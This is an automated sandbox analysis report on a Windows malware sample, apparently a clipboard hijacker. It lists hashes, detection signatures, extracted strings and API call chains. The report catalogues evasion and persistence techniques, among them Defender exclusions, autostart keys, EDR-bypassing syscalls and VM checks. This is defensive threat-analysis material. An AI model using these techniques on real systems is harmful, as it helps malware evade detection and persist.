Windows Analysis Report
SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe

Overview

General Information

Sample name: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe
Analysis ID: 1543318
MD5: 330709f05491b4e01ddf2af087d4e4f3
SHA1: 0f94e0f3f7ef87df645847f84a94572192f5fc39
SHA256: 3fa9bb2dffef3935ed2795dace89eec65270bd22a71e365ec1f55e0bf301fab5

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Adds a directory exclusion to Windows Defender
Creates an undocumented autostart registry key
Drops large PE files
Found direct / indirect Syscall (likely to bypass EDR)
Loading BitLocker PowerShell Module
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Sigma detected: Execution from Suspicious Folder
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses schtasks.exe or at.exe to add and modify task schedules
Changes image file execution options
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to modify clipboard data
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain checking for process token information
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry

Classification

AV Detection

Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe ReversingLabs: Detection: 21%
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: sunshine_clipper.pdb source: SgrmBroker.exe, 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmp, SgrmBroker.exe, 00000018.00000000.2352610812.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: gametoolset.pdb source: SppExtComObj.exe, 00000017.00000000.2292286211.00007FF68609E000.00000002.00000001.01000000.00000008.sdmp, SppExtComObj.exe, 00000017.00000002.2572042733.00007FF68609E000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: sunshine_clipper.pdbHG source: SgrmBroker.exe, 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmp, SgrmBroker.exe, 00000018.00000000.2352610812.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmp
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1683814431.00000245B10D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicK
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1675392956.00000245B1310000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1725977931.00000245B1212000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2437747374.00000236ACC78000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2404141053.00000236ACC78000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1675392956.00000245B1310000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1725977931.00000245B1212000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2437747374.00000236ACC78000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2404141053.00000236ACC78000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt05
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1675087516.00000245B10C3000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2410579033.00000236ACB03000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: powershell.exe, 0000000C.00000002.1965404029.000002139A1D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 0000000C.00000002.1965404029.000002139A1D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1675392956.00000245B1310000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1725977931.00000245B1212000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1675087516.00000245B10C3000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2410579033.00000236ACB03000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2437747374.00000236ACC78000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2404141053.00000236ACC78000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: powershell.exe, 0000000C.00000002.1959923759.0000021392240000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1675392956.00000245B1310000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1725977931.00000245B1212000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1675087516.00000245B10C3000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2410579033.00000236ACB03000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2437747374.00000236ACC78000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2404141053.00000236ACC78000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1675087516.00000245B10C3000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2410579033.00000236ACB03000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com1.3.6.1.5.5.7.48.2http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: SgrmBroker.exe, 00000018.00000003.2410579033.00000236ACB03000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crl
Source: powershell.exe, 0000000C.00000002.1942235658.00000213823FA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000C.00000002.1942235658.00000213823FA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.pngXzy
Source: powershell.exe, 0000000C.00000002.1967236251.000002139A336000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://schemas.microsoft.c
Source: powershell.exe, 0000000C.00000002.1942235658.00000213823FA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 0000000C.00000002.1942235658.00000213821D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000C.00000002.1942235658.00000213823FA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000C.00000002.1942235658.00000213823FA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000C.00000002.1942235658.00000213823FA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXzy
Source: powershell.exe, 0000000C.00000002.1967642062.000002139A4FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 0000000C.00000002.1942235658.00000213821D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: SgrmBroker.exe, 00000018.00000003.2404141053.00000236ACC5F000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2437747374.00000236ACCAD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/news/BreakingNews_72x72.svg
Source: powershell.exe, 0000000C.00000002.1959923759.0000021392240000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000C.00000002.1959923759.0000021392240000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000C.00000002.1959923759.0000021392240000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: SppExtComObj.exe, 00000017.00000002.2572042733.00007FF68609E000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://docs.rs/rustls/latest/rustls/manual/_03_howto/index.html#unexpected-eof
Source: SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gameplayapi.intel.com/api/games/downloadthumbnail/
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12C6000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC2F000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gameplayapi.intel.com/api/games/downloadthumbnail/.dllY
Source: SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gameplayapi.intel.com/api/games/getagsgames2/
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12C6000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC2F000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gameplayapi.intel.com/api/games/getagsgames2/H
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12C6000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC2F000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gameplayapi.intel.com/api/games/getagsgames2/P
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1728213124.00000245B11E6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12C0000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC28000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACDFE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gameplayapi.intel.com/api/games/getagsgames2/Y
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12C6000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC2F000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gameplayapi.intel.com/api/games/getagsgames2/y
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12E1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1728213124.00000245B11E6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12C0000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12C6000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC28000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC2F000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACDFE000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gameplayapi.intel.com/api/games/getagsgamesettings2/
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12E1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F8000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC2F000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gameplayapi.intel.com/api/games/getagsgamesettings2/B
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12E1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F8000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC2F000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gameplayapi.intel.com/api/games/getagsgamesettings2/j
Source: powershell.exe, 0000000C.00000002.1942235658.00000213823FA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000C.00000002.1942235658.00000213823FA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/PesterXzy
Source: powershell.exe, 0000000C.00000002.1967642062.000002139A4FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://go.microsoft.co
Source: powershell.exe, 0000000C.00000002.1959923759.0000021392240000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tst-gameplayapi.intel.com/api/games/downloadthumbnail/
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12E1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F8000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC2F000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tst-gameplayapi.intel.com/api/games/downloadthumbnail/B
Source: SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tst-gameplayapi.intel.com/api/games/downloadthumbnail/R
Source: SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tst-gameplayapi.intel.com/api/games/getagsgames2/
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12E1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F8000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC2F000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tst-gameplayapi.intel.com/api/games/getagsgames2/Z
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12C6000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC2F000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tst-gameplayapi.intel.com/api/games/getagsgames2/y
Source: SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tst-gameplayapi.intel.com/api/games/getagsgamesettings2/
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12C6000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC2F000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tst-gameplayapi.intel.com/api/games/getagsgamesettings2/Q
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1728213124.00000245B11E6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12C0000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC28000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACDFE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tst-gameplayapi.intel.com/api/games/getagsgamesettings2/R
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12E1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F8000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC2F000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tst-gameplayapi.intel.com/api/games/getagsgamesettings2/Z
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1728213124.00000245B11E6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12C0000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC28000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACDFE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tst-gameplayapi.intel.com/api/games/getagsgamesettings2/u
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9CF1530 OpenClipboard,GetLastError,Sleep,OpenClipboard,GetLastError,Sleep,OpenClipboard,GetLastError,Sleep,OpenClipboard,GetLastError,Sleep,OpenClipboard,GetLastError,Sleep,OpenClipboard,GetLastError,Sleep,OpenClipboard,GetLastError,Sleep,OpenClipboard,GetLastError,Sleep,OpenClipboard,GetLastError,Sleep,OpenClipboard,GetLastError,Sleep,OpenClipboard,GetLastError, 24_2_00007FF6D9CF1530
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9CFDB59 HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,CreateWaitableTimerExW,HeapFree,CreateWaitableTimerExW,HeapFree,HeapFree,WakeByAddressSingle,WakeByAddressSingle,WakeByAddressSingle,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,WaitOnAddress,WaitOnAddress,GetLastError,CreateWaitableTimerExW,WakeByAddressSingle,WaitOnAddress,WaitOnAddress,GetLastError,WakeByAddressSingle,MultiByteToWideChar,GlobalAlloc,GlobalLock,MultiByteToWideChar,GlobalUnlock,EmptyClipboard,GetLastError,SetClipboardData,GlobalFree,GetLastError,GetLastError,GlobalFree,GetCurrentThread,ImpersonateAnonymousToken,CloseClipboard,RevertToSelf,WakeByAddressSingle,HeapFree,CreateWaitableTimerExW,GetLastError,AddVectoredExceptionHandler,SetThreadStackGuarantee,GetCurrentThread,SetThreadDescription,SetThreadDescription, 24_2_00007FF6D9CFDB59
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9CFBF68 GetCurrentProcess,NtQueryInformationProcess,GetCurrentProcess,NtQueryInformationProcess,GetCurrentProcess,NtQueryInformationProcess,HeapReAlloc,HeapFree,CreateMutexW,CreateMutexExW,GetLastError,HeapFree,CloseHandle,HeapFree,HeapFree,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,CloseHandle,CloseHandle,CloseHandle,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,CloseHandle,HeapFree,CreateWaitableTimerExW,Sleep,GetClipboardData,GlobalLock,GlobalSize,WideCharToMultiByte,WideCharToMultiByte,GlobalUnlock,GetCurrentThread,ImpersonateAnonymousToken,CloseClipboard,CreateWaitableTimerExW,RevertToSelf,HeapFree,CreateWaitableTimerExW,SetWaitableTimer,WaitForSingleObject,CloseHandle,HeapFree,AddVectoredExceptionHandler,SetThreadStackGuarantee,GetCurrentThread,SetThreadDescription,SetThreadDescription,HeapFree, 24_2_00007FF6D9CFBF68

System Summary

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe File dump: SppExtComObj.exe.5.dr 706740224 Jump to dropped file
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9DCDA50 GetProcessTimes,GetLastError,GetSystemTimes,GetLastError,GetProcessIoCounters,OpenProcessToken,GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,GetLastError,GetLastError,CloseHandle,GetLastError,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,HeapFree,HeapFree,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,GetLastError,K32GetModuleFileNameExW,HeapFree,HeapFree,HeapFree,GetLastError,CloseHandle,HeapFree,ReadProcessMemory,HeapFree,GetLastError,HeapFree,HeapFree,HeapFree,HeapFree,VirtualQueryEx,ReadProcessMemory,HeapFree,HeapFree,GetLastError,HeapFree,HeapFree,HeapFree,HeapFree,ReadProcessMemory,HeapFree,GetLastError,HeapFree,HeapFree,HeapFree,HeapFree,RtlFreeHeap,HeapFree,HeapFree,HeapFree,VirtualQueryEx,HeapFree,HeapFree,HeapFree,RtlFreeHeap,ReadProcessMemory,HeapFree,GetLastError,HeapFree,HeapFree,HeapFree,HeapFree, 24_2_00007FF6D9DCDA50
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9DCF390 NtQueryInformationProcess,GetErrorInfo,NtQueryInformationProcess,HeapFree,HeapFree, 24_2_00007FF6D9DCF390
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9CFBF68 GetCurrentProcess,NtQueryInformationProcess,GetCurrentProcess,NtQueryInformationProcess,GetCurrentProcess,NtQueryInformationProcess,HeapReAlloc,HeapFree,CreateMutexW,CreateMutexExW,GetLastError,HeapFree,CloseHandle,HeapFree,HeapFree,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,CloseHandle,CloseHandle,CloseHandle,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,CloseHandle,HeapFree,CreateWaitableTimerExW,Sleep,GetClipboardData,GlobalLock,GlobalSize,WideCharToMultiByte,WideCharToMultiByte,GlobalUnlock,GetCurrentThread,ImpersonateAnonymousToken,CloseClipboard,CreateWaitableTimerExW,RevertToSelf,HeapFree,CreateWaitableTimerExW,SetWaitableTimer,WaitForSingleObject,CloseHandle,HeapFree,AddVectoredExceptionHandler,SetThreadStackGuarantee,GetCurrentThread,SetThreadDescription,SetThreadDescription,HeapFree, 24_2_00007FF6D9CFBF68
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9DB9FF0 GetStdHandle,GetLastError,GetConsoleMode,NtWriteFile,WaitForSingleObject,RtlNtStatusToDosError, 24_2_00007FF6D9DB9FF0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00007FF8490639D1 12_2_00007FF8490639D1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00007FF8490630E9 12_2_00007FF8490630E9
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9DD0ED0 24_2_00007FF6D9DD0ED0
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9CF8A90 24_2_00007FF6D9CF8A90
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9CF1680 24_2_00007FF6D9CF1680
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9CF7E40 24_2_00007FF6D9CF7E40
